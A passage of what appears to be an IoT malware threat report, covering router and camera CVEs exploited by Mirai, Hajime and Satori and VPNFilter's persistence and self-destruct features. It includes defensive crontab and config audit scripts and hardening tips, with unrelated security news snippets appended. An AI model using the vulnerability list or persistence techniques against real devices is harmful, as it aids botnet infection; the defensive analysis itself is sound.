As can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. What’s interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) CVE-2017-7240 vulnerability in PST10 WebServer, which is used in their firmware.

Port 7547

Attacks against remote device management (TR-069 specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. And that’s despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.

Another type of attack exploits the Chimay-Red vulnerability in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.

IP cameras

IP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about them was published, new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities appeared. Just one week after these malicious programs began to be actively distributed, the number of infected devices climbed to 57,000.

On June 8, 2018, a proof-of-concept was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking GPON routers.

New malware and threats to end users

DDoS attacks

As before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.

This is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often be “cured” with a simple reboot.

Cryptocurrency mining

Another type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.

A more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:

  • At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular:
    • CVE-2014-8361 – RCE in the miniigd SOAP service in Realtek SDK
    • CVE-2017-17215 – RCE in the firmware of Huawei HG532 routers
    • CVE-2018-10561, CVE-2018-10562 – authorization bypass and execution of arbitrary commands on Dasan GPON routers
    • CVE-2018-10088 – buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers
  • Using compromised routers and the CVE-2018-1000049 vulnerability in the Claymore Ethereum miner remote management tool, they substitute the wallet address for their own.

Data theft

The VPNFilter Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals’ server. Here are the main features of VPNFilter:

  • Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected that is able to inject JavaScript code into intercepted web pages.
  • Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.
  • Uses Tor for communication with C&C.
  • Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.

The Trojan’s distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.
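The reboot-resistance feature listed above (persistence through the Linux crontab) is something a defender can look for on a device to which they have shell access. The Python below is an added example of such a check, not Kaspersky’s tooling and not a VPNFilter signature: it parses a crontab dump and flags entries whose command runs from a temporary or runtime directory or uses a hidden (dot-prefixed) path component. The directory list and both heuristics are assumptions chosen for illustration; the NVRAM persistence path mentioned in the report is device-specific and is not covered here.

```python
import re

# Constructed sample crontab contents (not an actual VPNFilter artefact): one
# ordinary maintenance job followed by two entries with traits the audit flags.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /tmp/.x/run.sh
@reboot /var/run/.cache/upd >/dev/null 2>&1
"""

# Assumed heuristic: directories that firmware does not normally schedule jobs from.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/", "/run/")

# "@reboot /cmd" style entries, which survive a reboot by definition.
SPECIAL_RE = re.compile(r"^@(reboot|hourly|daily|weekly|monthly|yearly|annually)\s+(.+)$")
# A path component that starts with a dot, e.g. "/tmp/.x/", hidden from a plain "ls".
HIDDEN_RE = re.compile(r"/\.[^/\s]+")


def parse_crontab(text):
    """Return a list of (schedule, command) tuples; comments and blank lines are ignored."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = SPECIAL_RE.match(line)
        if m:
            entries.append(("@" + m.group(1), m.group(2)))
            continue
        fields = line.split(None, 5)  # five time fields, then the command
        if len(fields) == 6:
            entries.append((" ".join(fields[:5]), fields[5]))
    return entries


def audit_crontab(text):
    """Return one finding per entry that matches at least one persistence heuristic."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if any(d in command for d in SUSPICIOUS_DIRS):
            reasons.append("runs from temporary or runtime directory")
        if HIDDEN_RE.search(command):
            reasons.append("hidden path component")
        if reasons:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"{f['schedule']:<12} {f['command']}  <- {', '.join(f['reasons'])}")
```

On the constructed sample the logrotate job passes and the two other entries are reported. The check is deliberately conservative: a matching entry is a lead to inspect, not proof of infection, and a clean crontab says nothing about the NVRAM-based persistence the report also describes.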

The very first VPNFilter report spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:

  • ASUS
  • D-Link
  • Huawei
  • Linksys
  • MikroTik
  • Netgear
  • QNAP
  • TP-Link
  • Ubiquiti
  • Upvel
  • ZTE

The situation is made worse by the fact that these manufacturers’ devices are used not only in corporate networks, but often as home routers.

Conclusion

Smart devices are on the rise, with some forecasts suggesting that by 2020 their number will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).

Malware for smart devices is increasing not only in quantity, but also in quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.

Here are some simple tips to help minimize the risk of smart device infection:

  • Don’t give access to the device from an external network unless absolutely necessary
  • Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)
  • Regularly check for new firmware versions and update the device
  • Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters
  • Change the factory passwords at initial setup (even if the device does not prompt you to do so)
  • Close/block unused ports, if there is such an option. For example, if you don’t connect to the router via Telnet (port TCP:23), it’s a good idea to disable it so as to close off a potential loophole to intruders.
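As an added example of turning the tips above into a repeatable check (this is not code from the report or from any device vendor), the Python below audits a device configuration against them: factory password changed, password meets the stated complexity rule (at least 8 characters with upper and lower case, numerals and special characters), no management access from the external network, unused services closed, and firmware at the latest version. The configuration field names and both sample configurations are hypothetical; a real deployment would fill the dictionary from the device’s exported settings.

```python
import re

# Constructed configurations (not real devices): a router as it might ship, and the
# same router after applying the report's tips. Field names are assumptions.
WEAK_CONFIG = {
    "admin_password": "admin",
    "default_password": "admin",
    "wan_management_enabled": True,
    "open_services": {"telnet": 23, "ssh": 22, "http": 80, "tr069": 7547},
    "used_services": {"http"},
    "firmware_version": "1.0.3",
    "latest_firmware_version": "1.1.0",
}

HARDENED_CONFIG = {
    "admin_password": "Rk7!wq2#LpZ",
    "default_password": "admin",
    "wan_management_enabled": False,
    "open_services": {"http": 80},
    "used_services": {"http"},
    "firmware_version": "1.1.0",
    "latest_firmware_version": "1.1.0",
}


def password_meets_policy(pw):
    """The report's rule: >= 8 characters with upper case, lower case, a digit and a special character."""
    return (len(pw) >= 8
            and re.search(r"[A-Z]", pw) is not None
            and re.search(r"[a-z]", pw) is not None
            and re.search(r"\d", pw) is not None
            and re.search(r"[^A-Za-z0-9]", pw) is not None)


def version_tuple(v):
    """Turn '1.0.3' into (1, 0, 3) so versions compare numerically, not as strings."""
    return tuple(int(p) for p in v.split("."))


def audit_device(cfg):
    """Return a list of findings, one per tip the configuration violates (empty when clean)."""
    findings = []
    if cfg["admin_password"] == cfg["default_password"]:
        findings.append("factory password unchanged")
    elif not password_meets_policy(cfg["admin_password"]):
        findings.append("admin password does not meet complexity policy")
    if cfg["wan_management_enabled"]:
        findings.append("management reachable from external network")
    for name, port in sorted(cfg["open_services"].items()):
        if name not in cfg["used_services"]:
            findings.append(f"unused service {name} open on TCP:{port}")
    if version_tuple(cfg["firmware_version"]) < version_tuple(cfg["latest_firmware_version"]):
        findings.append(f"firmware {cfg['firmware_version']} behind {cfg['latest_firmware_version']}")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, "->", audit_device(cfg) or "no findings")
```

The weak configuration produces six findings (unchanged factory password, WAN management, three unused services including Telnet on TCP:23 and TR-069 on TCP:7547, and outdated firmware); the hardened one produces none. The order of checks mirrors the tips, and the password check only runs once the factory password has actually been changed, since an unchanged default is the more urgent finding.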

SecurityWeek RSS Feed: Code Execution in Alpine Linux Impacts Containers

A security researcher discovered several vulnerabilities in Alpine Linux, a distribution commonly used with Docker, including one that could allow for arbitrary code execution. 

Based on musl and BusyBox, the Alpine Linux distribution has a small size and is heavily used in containers, including Docker, as it provides fast boot times. 

SecurityWeek RSS Feed

Podcast Episode 112: what it takes to be a top bug hunter

In this week’s episode (#112): top bug hunters can earn more than $1 million a year from “bounties” paid for information on exploitable software holes in common platforms and applications. What does it take to be among the best? We talk with Jason Haddix of the firm Bug Crowd to find out. Also: The Internet Society’s Jeff...


A CSS-Based Web Attack Can Restart Your iPhone Or Freeze Your Mac

A researcher discovered a new CSS-based web attack that can make your iPhone restart or respring. Moreover, Mac users may

A CSS-Based Web Attack Can Restart Your iPhone Or Freeze Your Mac on Latest Hacking News.

Microsoft Patched FragmentSmack Vulnerability Targeting Windows

This Tuesday, Microsoft September Patch was rolled out containing fixes for a number of security vulnerabilities. While it gained attention

Microsoft Patched FragmentSmack Vulnerability Targeting Windows on Latest Hacking News.

SecurityWeek RSS Feed: Google’s Android Team Finds Serious Flaw in Honeywell Devices

Members of Google’s Android team discovered that some of Honeywell’s Android-based handheld computers are affected by a high severity privilege escalation vulnerability. The vendor has released software updates that should address the flaw.


Intel Patched A Vulnerability Leaking Intel ME Encryption Keys

Despite continuous patches, Intel CPUs keep making the news for one or another vulnerabilities being spotted by researchers. While numerous

Intel Patched A Vulnerability Leaking Intel ME Encryption Keys on Latest Hacking News.